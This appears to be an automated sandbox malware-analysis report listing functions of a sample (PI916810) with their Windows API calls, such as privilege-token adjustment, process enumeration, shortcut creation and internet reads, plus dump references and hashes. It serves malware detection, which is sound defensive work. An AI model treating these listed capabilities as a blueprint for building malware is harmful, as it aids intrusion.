                                                                                                                                                                            Function 004CC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 004CC69D
                                                                                                                                                                            • CoCreateInstance.OLE32(004F2D6C,00000000,00000001,004F2BDC,?), ref: 004CC6B5
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 004CC922
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                            • API String ID: 2683427295-24824748
                                                                                                                                                                            • Opcode ID: 418ac9b19768abae70dbba81a0b7184081ec0ca0bbc0aba8ae9cb0baeb5f5328
                                                                                                                                                                            • Instruction ID: 8bfc98877d49b963ff5e560f1bcf2c2f90033c46a324d8231c303422cf8cac22
                                                                                                                                                                            • Opcode Fuzzy Hash: 418ac9b19768abae70dbba81a0b7184081ec0ca0bbc0aba8ae9cb0baeb5f5328
                                                                                                                                                                            • Instruction Fuzzy Hash: 64A14C71108305AFD300EF55C891EABB7ECEF94708F04491EF19697192EBB4AE49CB56
                                                                                                                                                                            Function 004DC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,004A1D88,?), ref: 004DC312
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 004DC324
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-1816364905
                                                                                                                                                                            • Opcode ID: 24dd6b1cbfb313ddd60ef32739006d7cc8b5aeefa95d530e010263e6735e7c91
                                                                                                                                                                            • Instruction ID: 7f8d00adb1136a74fcaf73f0e8eb7d528cd66f9ce405420e305f9caa33305f36
                                                                                                                                                                            • Opcode Fuzzy Hash: 24dd6b1cbfb313ddd60ef32739006d7cc8b5aeefa95d530e010263e6735e7c91
                                                                                                                                                                            • Instruction Fuzzy Hash: 30E08C70200703CFDB204B25D898A87BAD4EB08305B90C43BE885C6310E778D880CAA8
                                                                                                                                                                            Function 004DF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 004DF151
                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 004DF15F
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 004DF21F
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 004DF22E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2576544623-0
                                                                                                                                                                            • Opcode ID: 1a60c7d782458b3b506c74f4bdea9406adc5d92d204113efb340a71d11065cf3
                                                                                                                                                                            • Instruction ID: dc8a69fdf3c9dfbb50a6cb0d5cc08ebfebd8b6028c5d7b5e23b4da58d6dc7396
                                                                                                                                                                            • Opcode Fuzzy Hash: 1a60c7d782458b3b506c74f4bdea9406adc5d92d204113efb340a71d11065cf3
                                                                                                                                                                            • Instruction Fuzzy Hash: 9A518D715043009FD320EF21DC95E6BBBE8FF98714F14492EF49697292EB74A908CB96
                                                                                                                                                                            Function 004BEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004BEB19
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                            • String ID: ($|
                                                                                                                                                                            • API String ID: 1659193697-1631851259
                                                                                                                                                                            • Opcode ID: 45acc27499f8a6b6ca866d3e905fce752f64e57d7230772dff9077ba27d4c961
                                                                                                                                                                            • Instruction ID: 1530f976f4f5d8e1bad10be6c8b05ba40905a0e31b3b7872438a5e64cfe39695
                                                                                                                                                                            • Opcode Fuzzy Hash: 45acc27499f8a6b6ca866d3e905fce752f64e57d7230772dff9077ba27d4c961
                                                                                                                                                                            • Instruction Fuzzy Hash: D8324774A04605DFD728DF1AC481AAAB7F0FF88310B15C56EE99ACB3A1DB70E941CB54
                                                                                                                                                                            Function 004D25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004D1AFE,00000000), ref: 004D26D5
                                                                                                                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 004D270C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 599397726-0
                                                                                                                                                                            • Opcode ID: 1e6d414c0c157abbbf3fdbeb6e2f5d4a7adacb03a2928db9b28d486fc1536f0f
                                                                                                                                                                            • Instruction ID: 2ca37aabe8ef0a63ef6e0552884ae946c31afb6111db344a620b3f9c8b3bcacd
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e6d414c0c157abbbf3fdbeb6e2f5d4a7adacb03a2928db9b28d486fc1536f0f
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E41E371500309BFEB209A95DE95EBFB7BCEB50718F10406FF601A6340EAF9DE419658
                                                                                                                                                                            Function 004CB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 004CB5AE
                                                                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004CB608
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004CB655
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1682464887-0
                                                                                                                                                                            • Opcode ID: bdee9a5238a9d933787777141807df89f80e68fcb747954a9234e152da87e716
                                                                                                                                                                            • Instruction ID: 881d236e3c1657baff09a6681028b6c647f1e4b318d0d1fd1e135c88265220c8
                                                                                                                                                                            • Opcode Fuzzy Hash: bdee9a5238a9d933787777141807df89f80e68fcb747954a9234e152da87e716
                                                                                                                                                                            • Instruction Fuzzy Hash: 00217C35A00508EFCB00EFA5D880EADBBB8FF48314F0480AEE845AB351DB359906CB55
                                                                                                                                                                            Function 004B8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00480FF6: std::exception::exception.LIBCMT ref: 0048102C
                                                                                                                                                                              • Part of subcall function 00480FF6: __CxxThrowException@8.LIBCMT ref: 00481041
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B8D0D
                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B8D3A
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004B8D47
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1922334811-0
                                                                                                                                                                            • Opcode ID: 3fbbf7622cc9b78fd689ba66d33b3f74ac98946ed14094843f8771e5672bd337
                                                                                                                                                                            • Instruction ID: 2451548bcf6cadf21a6bb0e5f63bae474d7a401c97aa0094bf4abbcb28e0f5a5
                                                                                                                                                                            • Opcode Fuzzy Hash: 3fbbf7622cc9b78fd689ba66d33b3f74ac98946ed14094843f8771e5672bd337
                                                                                                                                                                            • Instruction Fuzzy Hash: 6211BFB1414208AFE728AF54DC85D6BB7BCEB44710B20852FF84697251EF74AC45CB28
                                                                                                                                                                            Function 004C4021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004C404B
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 004C4088
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004C4091
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 33631002-0
                                                                                                                                                                            • Opcode ID: 71eda51fc9e4a872cb2ef5e5e797541f6d83f1876de959b5f53fd5c6c9de8f58
                                                                                                                                                                            • Instruction ID: 1fff60f2a7a83e4ef602301f48024cdb35c370274ba74dff41c6245c0ff8f068
                                                                                                                                                                            • Opcode Fuzzy Hash: 71eda51fc9e4a872cb2ef5e5e797541f6d83f1876de959b5f53fd5c6c9de8f58
                                                                                                                                                                            • Instruction Fuzzy Hash: 311182B1D40228BEE7109BE9DD44FAFBBBCEB48710F00466ABA04E7291C2785D0587E5
                                                                                                                                                                            Function 004C4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004C4C2C
                                                                                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004C4C43
                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 004C4C53
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3429775523-0
                                                                                                                                                                            • Opcode ID: 5f74f4b8082796be6b3a83536a9d73ee02dddd9a09d5b363379d12a3173cf2c7
                                                                                                                                                                            • Instruction ID: e1c95b64eedb8cb0ef2d997a41f36a4fa4b2ad83302a9cfb2f145643ec9e46b7
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f74f4b8082796be6b3a83536a9d73ee02dddd9a09d5b363379d12a3173cf2c7
                                                                                                                                                                            • Instruction Fuzzy Hash: 38F04F75D1130CBFDF04DFF0DD89AAEB7BCEF08211F004479A501E6182D6746A048B54
                                                                                                                                                                            Function 004C8B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __time64.LIBCMT ref: 004C8B25
                                                                                                                                                                              • Part of subcall function 0048543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004C91F8,00000000,?,?,?,?,004C93A9,00000000,?), ref: 00485443
                                                                                                                                                                              • Part of subcall function 0048543A: __aulldiv.LIBCMT ref: 00485463
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                            • String ID: 0uR
                                                                                                                                                                            • API String ID: 2893107130-201818601
                                                                                                                                                                            • Opcode ID: f59350d8fd491a055d6d602349670ec0e99a45be41d41f15e6ad36ed3063d7eb
                                                                                                                                                                            • Instruction ID: b68857d107ac3d43f745f928bff6341b114978c24bdfdb32f9aa4464109ee6b0
                                                                                                                                                                            • Opcode Fuzzy Hash: f59350d8fd491a055d6d602349670ec0e99a45be41d41f15e6ad36ed3063d7eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 8321D2726255108BC329CF29D841B52B3E1EFA9311B288E6DE0E5CB2D0DA74BD05DB94
                                                                                                                                                                            Function 0046E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5e69ebd1bcc3fd0ce73a77168cf58840f1ab81d0a73ab8df18e1b2cadb965d46
                                                                                                                                                                            • Instruction ID: 151f141dff08bee5f3cd29b1f5bb23b31a08d4683ff6913aa84ecce61d69c11f
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e69ebd1bcc3fd0ce73a77168cf58840f1ab81d0a73ab8df18e1b2cadb965d46
                                                                                                                                                                            • Instruction Fuzzy Hash: 5722CF78A00215CFCB24DF55C480AAEB7F1FF15300F14846BE956AB351F778A986CB9A
                                                                                                                                                                            Function 004CC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004CC966
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CC996
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                            • Opcode ID: b8e528881881ef3a9d8bcac78ed4f6c5eb6f20a51fd3d1b6e529a45d49842f89
                                                                                                                                                                            • Instruction ID: 26f97c592cf550f01a211883a64a663aeeae2a4d25255e71ad2304bba177fba9
                                                                                                                                                                            • Opcode Fuzzy Hash: b8e528881881ef3a9d8bcac78ed4f6c5eb6f20a51fd3d1b6e529a45d49842f89
                                                                                                                                                                            • Instruction Fuzzy Hash: D011A1766002009FDB10EF29C885A2AF7E9FF84324F04851EF8A9DB391DB74AC05CB85
                                                                                                                                                                            Function 004CA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,004D977D,?,004EFB84,?), ref: 004CA302
                                                                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,004D977D,?,004EFB84,?), ref: 004CA314
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                            • Opcode ID: c8d37244818da688a32e06cfbc73d219e47a9e279f0866ca44b497414384446a
                                                                                                                                                                            • Instruction ID: 19778028c8ac3e947c0504f842a589c4c6d9c97ed7d0ccd5958711946e32886c
                                                                                                                                                                            • Opcode Fuzzy Hash: c8d37244818da688a32e06cfbc73d219e47a9e279f0866ca44b497414384446a
                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0E23514422DABDB109FA4CC48FEA776DBF08365F00416AFD08D6192D6309914CBA5
                                                                                                                                                                            Function 004B8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004B8851), ref: 004B8728
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,004B8851), ref: 004B873A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 81990902-0
                                                                                                                                                                            • Opcode ID: aae05e16f1b63c583e587a642e5026b5f2a799bfe4957f2efdd1c3059e8c51d9
                                                                                                                                                                            • Instruction ID: 77e59dd1b0e90cb8c14865599fe1988fdae075d79b098e0679d6db6f6d4fb384
                                                                                                                                                                            • Opcode Fuzzy Hash: aae05e16f1b63c583e587a642e5026b5f2a799bfe4957f2efdd1c3059e8c51d9
